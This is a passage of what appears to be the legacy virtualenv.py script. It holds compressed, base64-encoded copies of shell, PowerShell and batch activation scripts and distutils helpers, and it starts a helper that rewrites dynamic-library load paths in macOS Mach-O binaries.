Xc4nY7U1uy28tAhAGG7Smbducj0wBuhKvmWa06Gc22kEDU1Jw04WskqWbBL01g7ARRwxpf4mEM9p
xKNUYqBb1WVRwm54pO8i5jydvtTmBqgJ4G1idWNQNz2m+mpaUqyUHGZKkDlO20ryASKwEe+YhtnM
vgNeedFcs5BMLTPIrN7IMq6aK4b8jIAENl3NCFR0jovrhOcaqWxxiYtYYnnDQQoDZPb7V7Cx9DbV
O+5VmFht93h2oh465PuUKxscY2S4OLm31wu611ot6Wpr1zu0zRqus1cqwTKYu/JIR+pYGb/V93fx
HbMcyUf/0uEfkHe38tLPQrfqjL1bi4bzzFUI3Qub8MYAMs599zB2OKB742JrA2zH9/WFZZSOhznQ
2FJR++S9CqcZbdJEkDBh9IEIkl8U8MQIkgf/kREkfWsmGBqNj9YDvWUCD4SaWD24V1A2jAB9ZkAk
PMBuXWBoTOXYTbovcpXcj+yF0qwrnUo+Yx6QI7t3kxEIvmpSuRnK3lVwuyJIvnTR4+/PP745OSda
zC5O3v7HyfeUlIXHJS1b9egQW5bvM7X3vfRvN9ymE2n6Bm+w7bkhlmuYNITO+04OQg+E/nq1vgVt
KzL39VCHTt1PtxMgvnvaLahDKrsXcscv0zUmbvpMK0870E85qdb8cjITzCNzUsfi0JzEmffN4YmW
0U5seWjhnPTWrjrR/qq+BXQg7j2xSda0Anhmgvxlj0xMxYwNzLOD0v7ffFBmOFYbmht0QAoX0rnJ
kS5xZFCV//8TKUHZxbi3Y0dxau/mpnZ8PKTspfN49ruQkSGIV+436s7PFfalTAeoEASs8PQ9hYyI
0X/6QNWmHzxT4nKfCov3Udlc2V+4Ztq5/WuCSQaVve9LcYISH7NC41WduokDtk+nAzl9dBqVr5xK
FtB8B0DnRjwVsDf6S6wQ51sRwsZRu2SYHEt01Jf1Ocij3XSwN7R6IfaHyk7dskshXg43XLYqO3WP
Q+6hHuihalPc51hgzNIcqicV3xFkPs4UdMGX53zgGbre9sPX28uXR/ZwAfkdXzuKhLLJRo5hv3Sy
MXdeKul0J2Ypp5Suh3s1JySsW1w5UNknGNrbdEpSBvY/Js+BIY289/0hM9PDu3p/1MbUst4RTEmM
n6kJTcsp4tG42yeT7nQbtdUFwgVJjwDSUYEAC8F0dKOTILrlLO/xC70bnNd0Ha97whQ6UkHJYj5H
cA/j+zX4tbtTIfGjujOKpj83aHOgXnIQbvYduNXEC4UMm4T21Bs+GHABuCa7v//LR/TvpjHa7oe7
/Grb6lVvHSD7spj5iplBLRKZxxEYGdCbY9LWWC5hBB2voWno6DJUMzfkC3T8KJsWL9umDQY5szPt
AVijEPwfucjncQ==
""")
##file activate.sh
ACTIVATE_SH = convert("""
eJytVVFv2jAQfs+vuIY+lGo0Yo+tmEQ1JJBaqBrWaWurYJKDWAo2ShxSWvW/7+yEEAhl0tY8EOI7
332++75zA8YhT2DGI4RFmiiYIqQJBpBxFYKdyDT2EaZcOMxXfMUU2nA+i+UCpiwJz60GrGUKPhNC
KohTAVxBwGP0VbS2rAA3u+CsCW8W0JOKBBUs14H0LbPQgBj1kowCQLHisRQLFApWLOZsGmFivPgM
HqElwD5980Y3372Hwf34R/fGu+uO+613G57hClSIwjjrRxs69mnN2S498GUpY2Ucy7UcXW2Tsc/4
cSS/xv3RsD+67R3GU5prqEpLHVtpOopw14twFoU1vU1CmVJpA1TUFdM2YCKA1yT8AlnI/RBCtkJg
9CKTLxcLbVYhU4YRRSjihc+iiJihJMwJATWa/s1krD+WjKhTbE0uAH4Se2SqCrPiYl6E2XHUBYJT
XV/wQybmmEBGNGSB/lmDphSlJXYsCTkG+9W/7rqm9S1ZLPx2+95D794djIYHW2AO2Irh6zcnwJUj
0ijaKdiHnXXbh1vqtmu9dNv1Jrrto90rzBsUucvG2hs+bLGdaGgGSwdsIUWAiYpTLTHcg9cAF6MZ
bBxO9gC0tGmjzU32d4vknNt5HGOEK7Yjw4qad3NbVgVtx/a8yqfn2VZRh+qRrJrEqJK5PIuPirfj
edeDoTfs3vY877Jwq6q3xL1Vgi4YrZBFaRFkPIpgxnik16teifbSTNZcxMVSrYHORYSFs1wc5DFl
AUlmnbF1k+L5Rk40JGFCsc5MOdMruCQml3GbcDUBLozarAqtjsyIDxSty7I3H/aPamnm5EledZJq
9b8P3O71Tc+7ux/d3o3/ktTQuWSwiWi/bLuZx6CGwkkHXj6QQ919GxGjBCuhJ1QdFGyB8LTT7id7
YgiuM9WSNEBPA84iGkfUAhow0KUVQRNjzv3i7pExL66NYgsihEotLx0ny7KLV1Q0Y1YXNIecRM5U
xmJ0mI7i7B7msQJxQqEPgn2aTJ7hwCHLKGdHDtrcbiyul+JVmR26vSziLMlvzY69XNN0FdBa5Au2
5v+njPpPGPP/OeL/dbwfGu1Utz87Sp7q
""")
##file activate.fish
ACTIVATE_FISH = convert("""
eJydVW2P2jgQ/s6vmAZQoVpA9/WkqqJaTou0u6x2uZVOVWWZZEKsS+yc7UDpr+84bziQbauLxEvs
eXnsZ56ZIWwTYSAWKUJWGAs7hMJgBEdhEwiMKnSIsBNywUMrDtziPBYmCeBDrFUG7v8HmCTW5n8u
Fu7NJJim81Bl08EQTqqAkEupLOhCgrAQCY2hTU+DQVxIiqgkRNiEBphFEKy+kd1BaFvwFOUBuIxA
oy20BKtAKp3xFMo0QNtCK5mhtMEA6BmSpUELKo38TThwLfguRVNaiRgs0llnEoIR29zfstf18/bv
5T17Wm7vAiiN3ONCzfbfwC3DtWXXDqHfAGX0q6z/bO82j3ebh1VwnbrduwTQbvwcRtesAfMGor/W
L3fs6Xnz8LRlm9fV8/P61sM0LDNwCZjl9gSpCokJRzpryGQ5t8kNGFUt51QjOZGu0Mj35FlYlXEr
yC09EVOp4lEXfF84Lz1qbhBsgl59vDedXI3rTV03xipduSgt9kLytI3XmBp3aV6MPoMQGNUU62T6
uQdeefTy1Hfj10zVHg2pq8fXDoHBiOv94csfXwN49xECqWREy7pwukKfvxdMY2j23vXDPuuxxeE+
JOdCOhxCE3N44B1ZeSLuZh8Mmkr2wEPAmPfKWHA2uxIRjEopdbQYjDz3BWOf14/scfmwoki1eQvX
ExBdF60Mqh+Y/QcX4uiH4Amwzx79KOVFtbL63sXJbtcvy8/3q5rupmO5CnE91wBviQAhjUUegYpL
vVEbpLt2/W+PklRgq5Ku6mp+rpMhhCo/lXthQTxJ2ysO4Ka0ad97S7VT/n6YXus6fzk3fLnBZW5C
KDC6gSO62QDqgFqLCCtPmjegjnLeAdArtSE8VYGbAJ/aLb+vnQutFhk768E9uRbSxhCMzdgEveYw
IZ5ZqFKl6+kz7UR4U+buqQZXu9SIujrAfD7f0FXpozB4Q0gwp31H9mVTZGGC4b871/wm7lvyDLu1
FUyvTj/yvD66k3UPTs08x1AQQaGziOl0S1qRkPG9COtBTSTWM9NzQ4R64B+Px/l3tDzCgxv5C6Ni
e+QaF9xFWrxx0V/G5uvYQOdiZzvYpQUVQSIsTr1TTghI33GnPbTA7/GCqcE3oE3GZurq4HeQXQD6
32XS1ITj/qLjN72ob0hc5C9bzw8MhfmL
""")
##file activate.csh
ACTIVATE_CSH = convert("""
eJx9VG1P2zAQ/u5fcYQKNgTNPtN1WxlIQ4KCUEGaxuQ6yYVYSuzKdhqVX7+zk3bpy5YPUXL3PPfc
ne98DLNCWshliVDV1kGCUFvMoJGugMjq2qQIiVSxSJ1cCofD1BYRnOVGV0CfZ0N2DD91DalQSjsw
tQLpIJMGU1euvPe7QeJlkKzgWixlhnAt4aoUVsLnLBiy5NtbJWQ5THX1ZciYKKWwkOFaE04dUm6D
r/zh7pq/3D7Nnid3/HEy+wFHY/gEJydg0aFaQrBFgz1c5DG1IhTs+UZgsBC2GMFBlaeH+8dZXwcW
VPvCjXdlAvCfQsE7al0+07XjZvrSCUevR5dnkVeKlFYZmUztG4BdzL2u9KyLVabTU0bdfg7a0hgs
cSmUg6UwUiQl2iHrcbcVGNvPCiLOe7+cRwG13z9qRGgx2z6DHjfm/Op2yqeT+xvOLzs0PTKHDz2V
tkckFHoQfQRXoGJAj9el0FyJCmEMhzgMS4sB7KPOE2ExoLcSieYwDvR+cP8cg11gKkVJc2wRcm1g
QhYFlXiTaTfO2ki0fQoiFM4tLuO4aZrhOzqR4dIPcWx17hphMBY+Srwh7RTyN83XOWkcSPh1Pg/k
TXX/jbJTbMtUmcxZ+/bbqOsy82suFQg/BhdSOTRhMNBHlUarCpU7JzBhmkKmRejKOQzayQe6MWoa
n1wqWmuh6LZAaHxcdeqIlVLhIBJdO9/kbl0It2oEXQj+eGjJOuvOIR/YGRqvFhttUB2XTvLXYN2H
37CBdbW2W7j2r2+VsCn0doVWcFG1/4y1VwBjfwAyoZhD
""")
##file activate.bat
ACTIVATE_BAT = convert("""
eJx9UdEKgjAUfW6wfxjiIH+hEDKUFHSKLCMI7kNOEkIf9P9pTJ3OLJ/03HPPPed4Es9XS9qqwqgT
PbGKKOdXL4aAFS7A4gvAwgijuiKlqOpGlATS2NeMLE+TjJM9RkQ+SmqAXLrBo1LLIeLdiWlD6jZt
r7VNubWkndkXaxg5GO3UaOOKS6drO3luDDiO5my3iA0YAKGzPRV1ack8cOdhysI0CYzIPzjSiH5X
0QcvC8Lfaj0emsVKYF2rhL5L3fCkVjV76kShi59NHwDniAHzkgDgqBcwOgTMx+gDQQqXCw==
""")
##file deactivate.bat
DEACTIVATE_BAT = convert("""
eJxzSE3OyFfIT0vj4ipOLVEI8wwKCXX0iXf1C7Pl4spMU0hJTcvMS01RiPf3cYmHyQYE+fsGhCho
cCkAAUibEkTEVhWLMlUlLk6QGixStlyaeCyJDPHw9/Pw93VFsQguim4ZXAJoIUw5DhX47XUM8UCx
EchHtwsohN1bILUgw61c/Vy4AJYPYm4=
""")
##file activate.ps1
ACTIVATE_PS = convert("""
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
rKQDxR6N/rffXv+lROXet/9Q+l9I4D1U
""")
##file distutils-init.py
DISTUTILS_INIT = convert("""
eJytV1uL4zYUfvevOE0ottuMW9q3gVDa3aUMXXbLMlDKMBiNrSTqOJKRlMxkf33PkXyRbGe7Dw2E
UXTu37lpxLFV2oIyifAncxmOL0xLIfcG+gv80x9VW6maw7o/CANSWWBwFtqeWMPlGY6qPjV8A0bB
C4eKSTgZ5LRgFeyErMEeOBhbN+Ipgeizhjtnhkn7DdyjuNLPoCS0l/ayQTG0djwZC08cLXozeMss
aG5EzQ0IScpnWtHSTXuxByV/QCmxE7y+eS0uxWeoheaVVfqSJHiU7Mhhi6gULbOHorshkrEnKxpT
0n3A8Y8SMpuwZx6aoix3ouFlmW8gHRSkeSJ2g7hU+kiHLDaQw3bmRDaTGfTnty7gPm0FHbIBg9U9
oh1kZzAFLaue2R6htPCtAda2nGlDSUJ4PZBgCJBGVcwKTAMz/vJiLD+Oin5Z5QlvDPdulC6EsiyE
NFzb7McNTKJzbJqzphx92VKRFY1idenzmq3K0emRcbWBD0ryqc4NZGmKOOOX9Pz5x+/l27tP797c
f/z0d+4NruGNai8uAM0bfsYaw8itFk8ny41jsfpyO+BWlpqfhcG4yxLdi/0tQqoT4a8Vby382mt8
p7XSo7aWGdPBc+b6utaBmCQ7rQKQoWtAuthQCiold2KfJIPTT8xwg9blPumc+YDZC/wYGdAyHpJk
vUbHbHWAp5No6pK/WhhLEWrFjUwtPEv1Agf8YmnsuXUQYkeZoHm8ogP16gt2uHoxcEMdf2C6pmbw
hUMsWGhanboh4IzzmsIpWs134jVPqD/c74bZHdY69UKKSn/+KfVhxLgUlToemayLMYQOqfEC61bh
cbhwaqoGUzIyZRFHPmau5juaWqwRn3mpWmoEA5nhzS5gog/5jbcFQqOZvmBasZtwYlG93k5GEiyw
buHhMWLjDarEGpMGB2LFs5nIJkhp/nUmZneFaRth++lieJtHepIvKgx6PJqIlD9X2j6pG1i9x3pZ
5bHuCPFiirGHeO7McvoXkz786GaKVzC9DSpnOxJdc4xm6NSVq7lNEnKdVlnpu9BNYoKX2Iq3wvgh
gGEUM66kK6j4NiyoneuPLSwaCWDxczgaolEWpiMyDVDb7dNuLAbriL8ig8mmeju31oNvQdpnvEPC
1vAXbWacGRVrGt/uXN/gU0CDDwgooKRrHfTBb1/s9lYZ8ZqOBU0yLvpuP6+K9hLFsvIjeNhBi0KL
MlOuWRn3FRwx5oHXjl0YImUx0+gLzjGchrgzca026ETmYJzPD+IpuKzNi8AFn048Thd63OdD86M6
84zE8yQm0VqXdbbgvub2pKVnS76icBGdeTHHXTKspUmr4NYo/furFLKiMdQzFjHJNcdAnMhltBJK
0/IKX3DVFqvPJ2dLE7bDBkH0l/PJ29074+F0CsGYOxsb7U3myTUncYfXqnLLfa6sJybX4g+hmcjO
kMRBfA1JellfRRKJcyRpxdS4rIl6FdmQCWjo/o9Qz7yKffoP4JHjOvABcRn4CZIT2RH4jnxmfpVG
qgLaAvQBNfuO6X0/Ux02nb4FKx3vgP+XnkX0QW9pLy/NsXgdN24dD3LxO2Nwil7Zlc1dqtP3d7/h
kzp1/+7hGBuY4pk0XD/0Ao/oTe/XGrfyM773aB7iUhgkpy+dwAMalxMP0DrBcsVw/6p25+/hobP9
GBknrWExDhLJ1bwt1NcCNblaFbMKCyvmX0PeRaQ=
""")
##file distutils.cfg
DISTUTILS_CFG = convert("""
eJxNj00KwkAMhfc9xYNuxe4Ft57AjYiUtDO1wXSmNJnK3N5pdSEEAu8nH6lxHVlRhtDHMPATA4uH
xJ4EFmGbvfJiicSHFRzUSISMY6hq3GLCRLnIvSTnEefN0FIjw5tF0Hkk9Q5dRunBsVoyFi24aaLg
9FDOlL0FPGluf4QjcInLlxd6f6rqkgPu/5nHLg0cXCscXoozRrP51DRT3j9QNl99AP53T2Q=
""")
##file activate_this.py
ACTIVATE_THIS = convert("""
eJyNU01v2zAMvetXEB4K21jnDOstQA4dMGCHbeihlyEIDMWmE62yJEiKE//7kXKdpEWLzYBt8evx
kRSzLPs6wiEoswM8YdMpjUXcq1Dz6RZa1cSiTkJdr86GsoTRHuCotBayiWqQEYGtMCgfD1KjGYBe
5a3p0cRKiEe2NtLAFikftnDco0ko/SFEVgEZ8aRCZDIPY9xbA8pE9M4jfW/B2CjiHq9zbJVZuOQq
siwTIvpxKYCembPAU4Muwi/Z4zfvrZ/MXipKeB8C+qisSZYiWfjJfs+0/MFMdWn1hJcO5U7G/SLa
xVx8zU6VG/PXLXvfsyyzUqjeWR8hjGE+2iCE1W1tQ82hsCJN9dzKaoexyB/uH79TnjwvxcW0ntSb
yZ8jq1Z5Q1UXsyy3gf9nbjTEj7NzQMfCJa/YSmrQ+2D/BqfiOi6sclrGzvoeVivIj8rcfcmnIQRF
7XCyeZI7DFe5/lhlCs5PRf5QW66VXT/NrlQ46oD/D6InkOmi3IQcbhKxAX2g4a+Xd5s3UtCtG2py
m8eg6WYWqR6SL5OjKMGfSrYt/6kxxQtOpeAgj1LXBNmpE2ElmCSIy5H0zFd8gJ924HWijWhb2hRC
6wNEm1QdDZtuSZcEprIUBo/XRNcbQe1OUbQ/r3hPTaPJJDNtFLu8KHV5XoNr3Eo6h6YtOKw8e8yw
VF5PnJ+ts3a9/Mz38RpG/AUSzYUW
""")
MH_MAGIC = 0xfeedface
MH_CIGAM = 0xcefaedfe
MH_MAGIC_64 = 0xfeedfacf
MH_CIGAM_64 = 0xcffaedfe
FAT_MAGIC = 0xcafebabe
BIG_ENDIAN = '>'
LITTLE_ENDIAN = '<'
LC_LOAD_DYLIB = 0xc
maxint = majver == 3 and getattr(sys, 'maxsize') or getattr(sys, 'maxint')
class fileview(object):
"""
A proxy for file-like objects that exposes a given view of a file.
Modified from macholib.
"""
def __init__(self, fileobj, start=0, size=maxint):
if isinstance(fileobj, fileview):
self._fileobj = fileobj._fileobj
else:
self._fileobj = fileobj
self._start = start
self._end = start + size
self._pos = 0
def __repr__(self):
return '<fileview [%d, %d] %r>' % (
self._start, self._end, self._fileobj)
def tell(self):
return self._pos
def _checkwindow(self, seekto, op):
if not (self._start <= seekto <= self._end):
raise IOError("%s to offset %d is outside window [%d, %d]" % (
op, seekto, self._start, self._end))
def seek(self, offset, whence=0):
seekto = offset
if whence == os.SEEK_SET:
seekto += self._start
elif whence == os.SEEK_CUR:
seekto += self._start + self._pos
elif whence == os.SEEK_END:
seekto += self._end
else:
raise IOError("Invalid whence argument to seek: %r" % (whence,))
self._checkwindow(seekto, 'seek')
self._fileobj.seek(seekto)
self._pos = seekto - self._start
def write(self, bytes):
here = self._start + self._pos
self._checkwindow(here, 'write')
self._checkwindow(here + len(bytes), 'write')
self._fileobj.seek(here, os.SEEK_SET)
self._fileobj.write(bytes)
self._pos += len(bytes)
def read(self, size=maxint):
assert size >= 0
here = self._start + self._pos
self._checkwindow(here, 'read')
size = min(size, self._end - here)
self._fileobj.seek(here, os.SEEK_SET)
bytes = self._fileobj.read(size)
self._pos += len(bytes)
return bytes
def read_data(file, endian, num=1):
"""
Read a given number of 32-bits unsigned integers from the given file
with the given endianness.
"""
res = struct.unpack(endian + 'L' * num, file.read(num * 4))
if len(res) == 1:
return res[0]
return res
def mach_o_change(path, what, value):
"""
Replace a given name (what) in any LC_LOAD_DYLIB command found in
the given binary with a new name (value), provided it's shorter.
"""
def do_macho(file, bits, endian):
# Read Mach-O header (the magic number is assumed read by the caller)
